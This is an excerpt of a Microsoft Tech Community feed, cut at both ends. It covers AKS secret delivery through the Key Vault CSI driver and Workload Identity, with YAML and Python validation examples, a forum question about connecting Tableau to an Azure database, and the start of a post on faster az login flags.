  --resource-group &amp;lt;resource-group&amp;gt;&lt;/LI-CODE&gt;
&lt;P&gt;The identity is then granted access to retrieve secrets from Azure Key Vault.&lt;/P&gt;
&lt;P&gt;Common approaches include:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Azure RBAC role assignments&lt;/LI&gt;
&lt;LI&gt;Microsoft Entra ID group-based access&lt;/LI&gt;
&lt;LI&gt;Key Vault access policies (legacy environments)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Typical required permissions include:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Get&lt;/LI&gt;
&lt;LI&gt;List&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;for secrets stored in the vault.&lt;/P&gt;
&lt;H2&gt;3. Configure Federated Identity Trust&lt;/H2&gt;
&lt;P&gt;Workload Identity relies on federation between:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;AKS&lt;/LI&gt;
&lt;LI&gt;Kubernetes ServiceAccounts&lt;/LI&gt;
&lt;LI&gt;Microsoft Entra ID&lt;/LI&gt;
&lt;LI&gt;Managed Identities&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;A Federated Identity Credential establishes this trust relationship.&lt;/P&gt;
&lt;P&gt;The implementation usually maps:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;a Kubernetes namespace&lt;/LI&gt;
&lt;LI&gt;a Kubernetes ServiceAccount&lt;/LI&gt;
&lt;LI&gt;an AKS OIDC issuer&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;to a specific Managed Identity.&lt;/P&gt;
&lt;P&gt;Example structure:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;system:serviceaccount:&amp;lt;namespace&amp;gt;:&amp;lt;serviceaccount&amp;gt;&lt;/LI-CODE&gt;
&lt;P&gt;This configuration is one of the most important parts of the setup because federation mismatches are a very common source of authentication failures.&lt;/P&gt;
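&lt;P&gt;Because the subject is a plain string, a mismatch is easy to introduce and easy to check for. The Python sketch below builds the expected subject from a namespace and ServiceAccount name and compares it with a configured value. The function names are hypothetical, and the comparison is treated here as exact and case-sensitive, which is an assumption of this sketch.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;def federated_subject(namespace, service_account):
    """Build the subject string in the structure shown above."""
    return f"system:serviceaccount:{namespace}:{service_account}"


def subject_matches(configured_subject, namespace, service_account):
    # Exact, case-sensitive comparison; no trimming or normalisation is applied.
    return configured_subject == federated_subject(namespace, service_account)


if __name__ == "__main__":
    expected = federated_subject("application-namespace", "workload-sa")
    print(expected)
    # A wrong namespace is enough to break the match.
    print(subject_matches(expected, "default", "workload-sa"))&lt;/LI-CODE&gt;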
&lt;H2&gt;4. Prepare Kubernetes Namespaces and ServiceAccounts&lt;/H2&gt;
&lt;P&gt;Application namespaces and ServiceAccounts are typically created before workload onboarding begins.&lt;/P&gt;
&lt;P&gt;The ServiceAccount acts as the identity boundary for the workload.&lt;/P&gt;
&lt;P&gt;Example:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;apiVersion: v1
kind: ServiceAccount
metadata:
  name: workload-sa
  namespace: application-namespace
  annotations:
    azure.workload.identity/client-id: "&amp;lt;managed-identity-client-id&amp;gt;"&lt;/LI-CODE&gt;
&lt;P&gt;This annotation links the Kubernetes ServiceAccount to the Azure Managed Identity.&lt;/P&gt;
&lt;H2&gt;Phase 2 — Application Onboarding&lt;/H2&gt;
&lt;P&gt;Once the platform capabilities are available, application onboarding becomes significantly simpler.&lt;/P&gt;
&lt;H2&gt;5. Define Secret Retrieval Using SecretProviderClass&lt;/H2&gt;
&lt;P&gt;The SecretProviderClass resource defines:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;which Key Vault secrets should be retrieved&lt;/LI&gt;
&lt;LI&gt;how those secrets should be exposed inside Kubernetes&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Example:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;apiVersion: secrets-store.csi.x-k8s.io/v1
kind: SecretProviderClass
metadata:
  name: workload-kv-secrets
  namespace: application-namespace

spec:
  provider: azure

  parameters:
    usePodIdentity: "false"
    clientID: "&amp;lt;managed-identity-client-id&amp;gt;"
    keyvaultName: "&amp;lt;keyvault-name&amp;gt;"
    tenantId: "&amp;lt;tenant-id&amp;gt;"

    objects: |
      array:
        - |
          objectName: application-secret
          objectType: secret

  secretObjects:
  - secretName: workload-secret
    type: Opaque
    data:
    - key: APPLICATION_SECRET
      objectName: application-secret&lt;/LI-CODE&gt;
&lt;P&gt;A few important concepts exist here:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;objects - Defines which Key Vault secrets to retrieve&lt;/LI&gt;
&lt;LI&gt;secretObjects - Optionally syncs secrets into Kubernetes Secrets&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This separation allows:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Key Vault secret naming&lt;/LI&gt;
&lt;LI&gt;Kubernetes secret naming&lt;/LI&gt;
&lt;LI&gt;application environment variable naming&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;to remain independent from one another.&lt;/P&gt;
&lt;P&gt;That flexibility is one of the biggest advantages of the CSI Driver approach.&lt;/P&gt;
&lt;H2&gt;6. Update Workloads to Use Workload Identity&lt;/H2&gt;
&lt;P&gt;Application deployments are then updated to:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;use the correct ServiceAccount&lt;/LI&gt;
&lt;LI&gt;enable Workload Identity&lt;/LI&gt;
&lt;LI&gt;mount the CSI volume&lt;/LI&gt;
&lt;LI&gt;optionally consume synced Kubernetes Secrets&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Typical workload changes include:&lt;/P&gt;
&lt;H3&gt;Enable Workload Identity&lt;/H3&gt;
&lt;LI-CODE lang="yaml"&gt;labels:
  azure.workload.identity/use: "true"&lt;/LI-CODE&gt;
&lt;P&gt;Without this label:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;token injection does not occur&lt;/LI&gt;
&lt;LI&gt;workload federation fails&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;Attach the ServiceAccount&lt;/H3&gt;
&lt;LI-CODE lang="yaml"&gt;serviceAccountName: workload-sa&lt;/LI-CODE&gt;
&lt;H3&gt;Mount the CSI Volume&lt;/H3&gt;
&lt;LI-CODE lang="yaml"&gt;volumes:
- name: secrets-store
  csi:
    driver: secrets-store.csi.k8s.io
    readOnly: true
    volumeAttributes:
      secretProviderClass: "workload-kv-secrets"&lt;/LI-CODE&gt;&lt;LI-CODE lang="yaml"&gt;volumeMounts:
- name: secrets-store
  mountPath: "/mnt/secrets-store"
  readOnly: true&lt;/LI-CODE&gt;
&lt;P&gt;Even if the application ultimately consumes secrets through environment variables, the CSI volume still needs to be mounted because the Kubernetes Secret synchronization occurs only after a successful mount.&lt;/P&gt;
&lt;H3&gt;Consume Secrets Inside the Application&lt;/H3&gt;
&lt;P&gt;Applications can consume secrets:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;directly as mounted files&lt;/LI&gt;
&lt;LI&gt;or through synced Kubernetes Secrets using secretKeyRef&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Example:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;env:
- name: APPLICATION_SECRET
  valueFrom:
    secretKeyRef:
      name: workload-secret
      key: APPLICATION_SECRET&lt;/LI-CODE&gt;
&lt;P&gt;One of the biggest operational advantages here is that applications usually require little or no code change.&lt;/P&gt;
&lt;P&gt;The application still reads:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;environment variables&lt;/LI&gt;
&lt;LI&gt;configuration values&lt;/LI&gt;
&lt;LI&gt;mounted files&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The underlying secret delivery mechanism changes — not the application contract.&lt;/P&gt;
&lt;H2&gt;7. Validate the Integration&lt;/H2&gt;
&lt;P&gt;Once deployed, teams typically validate:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;pod startup success&lt;/LI&gt;
&lt;LI&gt;successful CSI volume mounts&lt;/LI&gt;
&lt;LI&gt;secret retrieval from Key Vault&lt;/LI&gt;
&lt;LI&gt;environment variable injection&lt;/LI&gt;
&lt;LI&gt;workload authentication&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Common validation activities include:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;inspecting mounted secret paths&lt;/LI&gt;
&lt;LI&gt;checking pod logs&lt;/LI&gt;
&lt;LI&gt;reviewing CSI Driver logs&lt;/LI&gt;
&lt;LI&gt;confirming Key Vault access logs&lt;/LI&gt;
&lt;LI&gt;validating Workload Identity token injection&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Most implementation issues generally fall into one of these categories:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Federated Identity Credential mismatches&lt;/LI&gt;
&lt;LI&gt;missing workload labels&lt;/LI&gt;
&lt;LI&gt;Key Vault permission issues&lt;/LI&gt;
&lt;LI&gt;incorrect ServiceAccount mappings&lt;/LI&gt;
&lt;LI&gt;missing CSI volume mounts&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Operational Recommendation&lt;/H2&gt;
&lt;P&gt;For production environments, many organizations also add:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;automated secret rotation handling&lt;/LI&gt;
&lt;LI&gt;restart controllers such as Stakater Reloader&lt;/LI&gt;
&lt;LI&gt;readiness probes&lt;/LI&gt;
&lt;LI&gt;rolling deployment strategies&lt;/LI&gt;
&lt;LI&gt;monitoring and alerting around secret retrieval failures&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;These additions help ensure secret updates can occur safely with minimal or zero downtime.&lt;/P&gt;
&lt;H2&gt;Understanding the YAML Components&lt;/H2&gt;
&lt;P&gt;The implementation consists of three connected resources:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;ServiceAccount - Identity binding&lt;/LI&gt;
&lt;LI&gt;SecretProviderClass - Secret retrieval definition&lt;/LI&gt;
&lt;LI&gt;Deployment - Secret consumption&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Think of them as a chain:&lt;/P&gt;
&lt;LI-CODE lang="mermaid"&gt;ServiceAccount
   ↓
Managed Identity
   ↓
SecretProviderClass
   ↓
CSI Driver
   ↓
Deployment&lt;/LI-CODE&gt;
&lt;P&gt;If any naming mismatch exists, secret retrieval fails.&lt;/P&gt;
&lt;P&gt;Consistency matters.&lt;/P&gt;
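&lt;P&gt;The chain can also be checked mechanically before deployment. The following Python sketch takes the three manifests as already-parsed dictionaries (how they are loaded is left out) and reports the mismatches discussed in this article. The function name find_mismatches and the specific set of checks are assumptions for illustration, not an official validation tool.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;def find_mismatches(service_account, provider_class, deployment):
    """Return a list of human-readable problems; an empty list means names line up."""
    problems = []
    pod = deployment["spec"]["template"]
    pod_spec = pod["spec"]

    # The Deployment must run under the annotated ServiceAccount.
    if pod_spec.get("serviceAccountName") != service_account["metadata"]["name"]:
        problems.append("serviceAccountName does not match the ServiceAccount")

    # The pod template must carry the Workload Identity label.
    labels = pod.get("metadata", {}).get("labels", {})
    if labels.get("azure.workload.identity/use") != "true":
        problems.append('pod label azure.workload.identity/use is not "true"')

    # Both resources should point at the same Managed Identity client ID.
    annotations = service_account["metadata"].get("annotations", {})
    sa_client = annotations.get("azure.workload.identity/client-id")
    if provider_class["spec"]["parameters"].get("clientID") != sa_client:
        problems.append("clientID differs between ServiceAccount and SecretProviderClass")

    # At least one CSI volume must reference the SecretProviderClass by name.
    mounted = [
        volume["csi"].get("volumeAttributes", {}).get("secretProviderClass")
        for volume in pod_spec.get("volumes", [])
        if "csi" in volume
    ]
    if provider_class["metadata"]["name"] not in mounted:
        problems.append("no CSI volume references the SecretProviderClass")

    return problems&lt;/LI-CODE&gt;
&lt;P&gt;Run against the example resources in this article (workload-sa, workload-kv-secrets, and a Deployment that mounts the CSI volume), the function is expected to return an empty list.&lt;/P&gt;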
&lt;H2&gt;Secret Rotation and Reloaders&lt;/H2&gt;
&lt;P&gt;One major operational advantage is secret rotation.&lt;/P&gt;
&lt;P&gt;Previously:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Update secret&lt;/LI&gt;
&lt;LI&gt;Update pipeline variable&lt;/LI&gt;
&lt;LI&gt;Redeploy application&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;Now:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Rotate secret in Key Vault&lt;/LI&gt;
&lt;LI&gt;CSI driver refreshes mounted content (when secret rotation is enabled on the add-on)&lt;/LI&gt;
&lt;LI&gt;Application consumes updated value&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;For applications using environment variables:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;pod restarts are usually required&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Many teams use:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Stakater Reloader&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;to automatically restart workloads when secrets change.&lt;/P&gt;
&lt;P&gt;Combined with:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;multiple replicas&lt;/LI&gt;
&lt;LI&gt;readiness probes&lt;/LI&gt;
&lt;LI&gt;rolling deployments&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;this enables zero-downtime secret refresh workflows.&lt;/P&gt;
&lt;H2&gt;Common Pitfalls and Troubleshooting&lt;/H2&gt;
&lt;H3&gt;Federated Credential Subject Mismatch&lt;/H3&gt;
&lt;P&gt;This is the most common issue.&lt;/P&gt;
&lt;P&gt;The subject must exactly match:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;system:serviceaccount:&amp;lt;namespace&amp;gt;:&amp;lt;serviceaccount&amp;gt;&lt;/LI-CODE&gt;
&lt;H3&gt;Missing Workload Identity Label&lt;/H3&gt;
&lt;P&gt;This label is mandatory:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;azure.workload.identity/use: "true"
&lt;/LI-CODE&gt;
&lt;P&gt;Without it:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;no token injection occurs&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;Missing CSI Volume Mount&lt;/H3&gt;
&lt;P&gt;Even if using:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;secretKeyRef&lt;/LI-CODE&gt;
&lt;P&gt;the CSI volume must still be mounted.&lt;/P&gt;
&lt;P&gt;Otherwise:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Kubernetes Secret sync never occurs&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;Key Vault Permission Issues&lt;/H3&gt;
&lt;P&gt;Federation success does not guarantee Key Vault authorization.&lt;/P&gt;
&lt;P&gt;The Managed Identity still requires:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Get&lt;/LI&gt;
&lt;LI&gt;List&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;permissions on the vault.&lt;/P&gt;
&lt;H3&gt;Environment Variables Do Not Auto-Refresh&lt;/H3&gt;
&lt;P&gt;Secrets mounted as files can refresh dynamically depending on application behavior.&lt;/P&gt;
&lt;P&gt;Environment variables do not.&lt;/P&gt;
&lt;P&gt;If using:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;secretKeyRef&lt;/LI-CODE&gt;
&lt;P&gt;consider:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Reloader controllers&lt;/LI&gt;
&lt;LI&gt;rolling restart strategies&lt;/LI&gt;
&lt;LI&gt;readiness probes&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;to safely consume rotated secrets.&lt;/P&gt;
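&lt;P&gt;For applications that read secrets from the mounted files, picking up a rotated value can be as simple as re-reading the file when it changes. The Python sketch below shows one way to do that by watching the file's modification time. The class name FileSecret is hypothetical, and the example path assumes the mount path and objectName used earlier in this article.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import os


class FileSecret:
    """Re-read a mounted secret file whenever its modification time changes."""

    def __init__(self, path):
        self._path = path
        self._mtime = None
        self._value = None

    def get(self):
        # os.stat follows symlinks, so a swapped link target is noticed as well.
        mtime = os.stat(self._path).st_mtime_ns
        if mtime != self._mtime:
            with open(self._path, encoding="utf-8") as handle:
                self._value = handle.read().strip()
            self._mtime = mtime
        return self._value


if __name__ == "__main__":
    # Assumed path: mount path plus objectName from the earlier examples.
    secret = FileSecret("/mnt/secrets-store/application-secret")
    print(len(secret.get()))&lt;/LI-CODE&gt;
&lt;P&gt;Calling get() at the point of use, rather than caching the value at startup, is what lets the application see a rotated secret without a restart.&lt;/P&gt;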
&lt;H2&gt;Security and Operational Benefits&lt;/H2&gt;
&lt;P&gt;After migration, several improvements become immediately visible:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;No secret values in YAML&lt;/LI&gt;
&lt;LI&gt;No secret values in pipelines&lt;/LI&gt;
&lt;LI&gt;Runtime-only secret resolution&lt;/LI&gt;
&lt;LI&gt;Per-service identity isolation&lt;/LI&gt;
&lt;LI&gt;Centralized audit visibility in Azure&lt;/LI&gt;
&lt;LI&gt;Easier secret rotation&lt;/LI&gt;
&lt;LI&gt;Reduced operational blast radius&lt;/LI&gt;
&lt;LI&gt;Cleaner DevSecOps posture&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Most importantly:&lt;/P&gt;
&lt;P&gt;The deployment pipeline stops being part of the secret distribution mechanism.&lt;/P&gt;
&lt;H2&gt;Key Takeaways&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;Secrets should never flow through deployment pipelines&lt;/LI&gt;
&lt;LI&gt;Workload Identity removes the need for static credentials&lt;/LI&gt;
&lt;LI&gt;CSI Driver enables runtime secret retrieval directly from Key Vault&lt;/LI&gt;
&lt;LI&gt;SecretProviderClass allows clean secret name mapping&lt;/LI&gt;
&lt;LI&gt;File-based secret consumption is more secure than environment variables&lt;/LI&gt;
&lt;LI&gt;Secret rotation becomes operationally simpler and safer&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Microsoft Documentation References&lt;/H2&gt;
&lt;P&gt;Official Microsoft guidance:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;AKS Workload Identity &lt;A href="https://learn.microsoft.com/azure/aks/workload-identity-overview" target="_blank"&gt;https://learn.microsoft.com/azure/aks/workload-identity-overview&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Azure Key Vault Provider for Secrets Store CSI Driver &lt;A href="https://learn.microsoft.com/azure/aks/csi-secrets-store-driver" target="_blank"&gt;https://learn.microsoft.com/azure/aks/csi-secrets-store-driver&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Secrets Store CSI Driver &lt;A href="https://secrets-store-csi-driver.sigs.k8s.io/" target="_blank"&gt;https://secrets-store-csi-driver.sigs.k8s.io/&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Federated Identity Credentials &lt;A href="https://learn.microsoft.com/entra/workload-id/workload-identity-federation" target="_blank"&gt;https://learn.microsoft.com/entra/workload-id/workload-identity-federation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;These references are extremely useful when troubleshooting federation, RBAC, or CSI mounting issues.&lt;/P&gt;
&lt;H2&gt;Final Thoughts&lt;/H2&gt;
&lt;P&gt;The Azure Key Vault CSI Driver + Workload Identity pattern fundamentally changes how secrets flow through AKS environments.&lt;/P&gt;
&lt;P&gt;Instead of distributing secrets through:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;YAML&lt;/LI&gt;
&lt;LI&gt;CI/CD systems&lt;/LI&gt;
&lt;LI&gt;deployment artifacts&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;secrets remain protected behind:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;identities&lt;/LI&gt;
&lt;LI&gt;runtime authorization&lt;/LI&gt;
&lt;LI&gt;centralized access control&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The initial setup is slightly more involved than pipeline substitution, but once the platform foundations are established, onboarding additional workloads becomes lightweight and repeatable.&lt;/P&gt;
&lt;P&gt;This is one of the highest-leverage security improvements available for Kubernetes platforms because it removes an entire category of secret exposure risk without requiring major application rewrites.&lt;/P&gt;
&lt;P&gt;Secrets belong to identities — not deployment manifests.&lt;/P&gt;
&lt;P&gt;#Azure #AKS #Kubernetes #DevSecOps #CloudSecurity #KeyVault #WorkloadIdentity #PlatformEngineering&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 07:00:00 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-developer-community/getting-secrets-out-of-yaml-implementing-azure-key-vault-csi/ba-p/4522590</guid>
      <dc:creator>anandranjan</dc:creator>
      <dc:date>2026-06-08T07:00:00Z</dc:date>
    </item>
    <item>
      <title>Integrating Tableau with an Azure Internal Database</title>
      <link>https://techcommunity.microsoft.com/t5/azure/integrating-tableau-to-a-azure-internal-database/m-p/4526203#M22566</link>
      <description>&lt;P&gt;Hi everyone, I wanted to ask whether it's possible to connect Tableau to an internal database that I'm planning to build. Not just Tableau but Monday.com too. And yeah, I know I need to build the database and sort everything out first, but it's for my presentation. I would be really grateful if someone could answer this and show me a bit of how to do it. Do I need some token from Tableau or something?&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 04:57:55 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure/integrating-tableau-to-a-azure-internal-database/m-p/4526203#M22566</guid>
      <dc:creator>sharmerika</dc:creator>
      <dc:date>2026-06-08T04:57:55Z</dc:date>
    </item>
    <item>
      <title>Faster az login: introducing --skip-subscription-discovery and targeted --subscription</title>
      <link>https://techcommunity.microsoft.com/t5/azure-tools-blog/faster-az-login-introducing-skip-subscription-discovery-and/ba-p/4526116</link>
      <description>&lt;P data-line="2"&gt;&lt;STRONG&gt;TL;DR&lt;/STRONG&gt;&amp;nbsp;— If you belong to&amp;nbsp;&lt;STRONG&gt;many tenants&lt;/STRONG&gt;, or a tenant holds&amp;nbsp;&lt;STRONG&gt;hundreds or thousands of subscriptions&lt;/STRONG&gt;,&amp;nbsp;az login&amp;nbsp;can crawl — it tries to enumerate&amp;nbsp;&lt;EM&gt;every&lt;/EM&gt;&amp;nbsp;subscription in&amp;nbsp;&lt;EM&gt;every&lt;/EM&gt;&amp;nbsp;tenant before it returns. Two flags now let you skip that enumeration and make login near-instant:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;P&gt;az login --subscription &amp;lt;SUB_ID_OR_NAME&amp;gt;&lt;/P&gt;
&lt;P&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --subscription &amp;lt;SUB_ID_OR_NAME&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P data-line="10"&gt;&lt;STRONG&gt;Available in Azure CLI 2.86.0 and later.&lt;/STRONG&gt;&amp;nbsp;Both&amp;nbsp;--skip-subscription-discovery&amp;nbsp;(and its&amp;nbsp;--skip-sub&amp;nbsp;alias) ship in&amp;nbsp;&lt;STRONG&gt;az CLI v2.86.0&lt;/STRONG&gt;. Run&amp;nbsp;az version&amp;nbsp;to check, and&amp;nbsp;az upgrade&amp;nbsp;if you're on an older build.&lt;/P&gt;
&lt;P data-line="12"&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; --skip-subscription-discovery&amp;nbsp;requires&amp;nbsp;--tenant. Because you're skipping the tenant/subscription enumeration, the CLI can't infer which tenant to sign in to, so you must name it explicitly. Running&amp;nbsp;az login --skip-subscription-discovery&amp;nbsp;on its own fails with&amp;nbsp;usage error: '--skip-subscription-discovery' requires '--tenant'.&lt;/P&gt;
&lt;P data-line="12"&gt;&amp;nbsp;&lt;/P&gt;
&lt;H2 data-line="14"&gt;The problem: login enumerates every subscription in every tenant&lt;/H2&gt;
&lt;P data-line="18"&gt;This post is about&amp;nbsp;&lt;STRONG&gt;one specific pain point&lt;/STRONG&gt;: what happens when you have&amp;nbsp;&lt;STRONG&gt;a large number of tenants, and tenants that each contain hundreds or thousands of subscriptions&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P data-line="20"&gt;When you run&amp;nbsp;az login, the CLI doesn't just authenticate you. After auth, it&amp;nbsp;&lt;STRONG&gt;walks every tenant you can access and calls ARM to list every subscription in each one&lt;/STRONG&gt;, then caches the full catalog locally. The cost of that step scales with&amp;nbsp;&lt;STRONG&gt;(number of tenants) × (subscriptions per tenant)&lt;/STRONG&gt;, so it's barely noticeable for a developer with one tenant and a couple of subscriptions, but login time balloons at enterprise scale:&lt;/P&gt;
&lt;UL data-line="22"&gt;
&lt;LI data-line="22"&gt;A user who is a member or guest of&amp;nbsp;&lt;STRONG&gt;dozens of tenants&lt;/STRONG&gt;&amp;nbsp;pays a separate ARM round trip&amp;nbsp;&lt;EM&gt;per tenant&lt;/EM&gt;.&lt;/LI&gt;
&lt;LI data-line="23"&gt;A single tenant with&amp;nbsp;&lt;STRONG&gt;hundreds or thousands of subscriptions&lt;/STRONG&gt;&amp;nbsp;means one giant (often paged) enumeration just to build a list you may never look at.&lt;/LI&gt;
&lt;LI data-line="24"&gt;Put both together — many tenants, each dense with subscriptions — and the enumeration dominates everything. The interactive sign-in is fast; the&amp;nbsp;&lt;STRONG&gt;post-auth subscription discovery&lt;/STRONG&gt;&amp;nbsp;is what makes you wait.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-line="26"&gt;In these high-scale tenant/subscription topologies,&amp;nbsp;az login&amp;nbsp;taking&amp;nbsp;&lt;STRONG&gt;30 seconds to several minutes&lt;/STRONG&gt;&amp;nbsp;is common — and almost all of that time is the discovery walk, not authentication. That is exactly the cost these flags remove.&lt;/P&gt;
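&lt;P&gt;To make the scaling concrete, here is a minimal back-of-the-envelope sketch in Python. It is not how the CLI is implemented: the function name, the page size, and the tenant layouts are hypothetical values chosen for illustration. The only idea taken from the text above is that discovery costs at least one (often paged) ARM listing per tenant.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import math


def estimated_list_calls(subs_per_tenant, page_size):
    """Estimate ARM list round trips: one paged listing per tenant.

    Both arguments are illustrative assumptions, not CLI internals.
    """
    # Even a tenant with zero subscriptions costs one round trip.
    return sum(max(1, math.ceil(count / page_size)) for count in subs_per_tenant)


# Hypothetical topologies: a solo developer vs. a guest in 30 dense tenants.
solo_dev = [2]
enterprise = [1500] * 30

print(estimated_list_calls(solo_dev, page_size=100))
print(estimated_list_calls(enterprise, page_size=100))&lt;/LI-CODE&gt;
&lt;P&gt;Under these made-up numbers the second topology needs hundreds of sequential listings where the first needs one, which is the shape of the slowdown described above.&lt;/P&gt;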
&lt;P data-line="28"&gt;Other situations (CI/CD pinned to one known subscription, conditional-access tenants, etc.) benefit too, but they're secondary. The flags exist first and foremost to rescue the&amp;nbsp;&lt;STRONG&gt;many-tenants / many-subscriptions&lt;/STRONG&gt; case.&lt;/P&gt;
&lt;P data-line="28"&gt;&amp;nbsp;&lt;/P&gt;
&lt;H2 data-line="25"&gt;What's new&lt;/H2&gt;
&lt;H3 data-line="27"&gt;1.&amp;nbsp;--skip-subscription-discovery&amp;nbsp;(alias&amp;nbsp;--skip-sub)&lt;/H3&gt;
&lt;P data-line="36"&gt;Authenticate only.&amp;nbsp;&lt;STRONG&gt;Skip the subscription enumeration entirely.&lt;/STRONG&gt;&amp;nbsp;No tenant fan-out, no ARM&amp;nbsp;GET /subscriptions&amp;nbsp;calls per tenant. This flag&amp;nbsp;&lt;STRONG&gt;requires&amp;nbsp;--tenant&lt;/STRONG&gt;&amp;nbsp;— since discovery is skipped, you must tell the CLI which tenant to authenticate against.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P data-line="28"&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;P data-line="28"&gt;# or the short form&lt;/P&gt;
&lt;P data-line="28"&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --skip-sub&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P data-line="44"&gt;After this,&amp;nbsp;az account list&amp;nbsp;will be empty until you explicitly populate it (e.g. by&amp;nbsp;az login --subscription &amp;lt;id&amp;gt;&amp;nbsp;later, or by running a command that targets a subscription you know).&lt;/P&gt;
&lt;P data-line="46"&gt;The flag is independent of&amp;nbsp;&lt;EM&gt;how&lt;/EM&gt;&amp;nbsp;you authenticate — interactive (the WAM account picker or browser), device code, service principal, or managed identity all work the same way. You complete your normal sign-in, just without the subscription enumeration afterward.&lt;/P&gt;
&lt;P data-line="48"&gt;&lt;STRONG&gt;Best for:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL data-line="49"&gt;
&lt;LI data-line="49"&gt;&lt;STRONG&gt;Users who belong to many tenants, or tenants with hundreds-to-thousands of subscriptions&lt;/STRONG&gt;&amp;nbsp;— this is where the win is biggest, because you skip the enumeration that scales with&amp;nbsp;&lt;EM&gt;(tenants) × (subscriptions per tenant)&lt;/EM&gt;. Pin the one subscription you need via&amp;nbsp;--subscription&amp;nbsp;or&amp;nbsp;AZURE_SUBSCRIPTION_ID.&lt;/LI&gt;
&lt;LI data-line="50"&gt;Local developers who hit&amp;nbsp;az login&amp;nbsp;dozens of times a day and only ever work in one subscription. (You'll still get the interactive WAM account picker — that's the auth step; only the post-auth subscription enumeration is skipped.)&lt;/LI&gt;
